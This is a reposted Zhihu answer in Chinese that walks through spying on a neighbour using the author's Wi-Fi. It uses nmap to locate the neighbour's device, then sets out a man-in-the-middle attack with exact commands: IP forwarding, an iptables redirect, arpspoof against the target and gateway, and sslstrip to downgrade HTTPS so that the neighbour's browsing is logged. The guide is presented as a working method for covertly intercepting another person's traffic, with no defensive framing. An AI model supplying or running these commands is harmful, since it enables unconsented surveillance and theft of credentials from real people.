作者:秋山澪
鏈接:https://www.zhihu.com/question/43462233/answer/96115295
來源:知乎
著作權歸作者所有,轉載請聯系作者獲得授權。
1.
掃描網絡內用戶 - Nmap
首先假定你的鄰居已經連上了你家Wi-Fi,如果想要查看他瀏覽的內容,你需要先定位到哪一個設備是你的鄰居。MAC地址和IP地址的話從路由器設置的頁面就可以看到,如果還想查看更多信息的話,Nmap是一款非常實用的工具。
首先獲得路由器網關的地址,如圖所示我家Wi-Fi的路由器地址是192.168.0.1
route –n
然后用Nmap掃描連接到該網絡下的所有設備,圖里192.168.0.109就是我用來模擬鄰居的另一臺筆記本。不光IP和MAC地址可以顯示,相應的設備信息(比如圖中這個Huawei Technologies),用了什么什么操作系統(OS
details)都可以在nmap掃描的結果中看到。記好鄰居的IP和你路由器的地址,我們接下來要用到。
nmap -sS -O 192.168.0.1/24
2.
中間人攻擊 – arpspoof & sslstrip
所謂中間人攻擊(MitM)指的是攻擊者插入到正在交流的雙方中間,竊取并修改其中的通信,而雙方仍然認為自己正和對方一對一的直接交流。
剛才有人說到現在很多網站用的都是HTTPS而不是HTTP,所以信息會被加密無法破解。那么首先什么是HTTP和HTTPS呢,我們可以簡單的理解為兩種網絡通信時的協議,區別是HTTPS要比HTTP安全的多。的確HTTPS的信息很難破解,但是這不意味著我們面對HTTPS毫無辦法。
sslstrip 這個工具可以把我們無法破解的HTTPS請求轉換成HTTP請求。如圖所示受害者想要通過HTTPS連接一個網站,arpspoof(待會兒會提到)這個工具可以讓我的電腦偽裝成路由器的樣子,于是路由器會把收到的HTTPS請求轉發給我的電腦。這時我用sslstrip把HTTPS請求轉換成HTTP請求,再發回給路由器,路由器會緊跟著把HTTP請求轉發給目標網站。目標網站收到HTTP請求后就和受害者建立了HTTP而不是HTTPS請求。
接下來是具體操作:
首先用這兩條命令開啟IP轉發并建一個iptables rule 來讓本機可以轉發消息。
echo 1 >
/proc/sys/net/ipv4/ip_forward
iptables -t nat -A
PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
接下來arpspoof可以把目標設備的網絡通信轉發給我,interface用來指明你想用哪個網絡接口,這個可以用ifconfig命令看到.
arpspoof -i interface -t target IP -r gateway IP
target IP和gateway IP我們在之前已經獲得了,于是我實際輸入的指令是:
arpspoof -i wlan0 -t
192.168.0.109 -r 192.168.0.1
可以看到arpspoof已經開始工作,保持這個窗口開啟,然后打開一個新的終端啟動sslstrip
sslstrip -l 8080
這時鄰居在這個網絡下所做的事情就都記錄在sslstrip的日志文件里了
cat sslstrip.log
收工。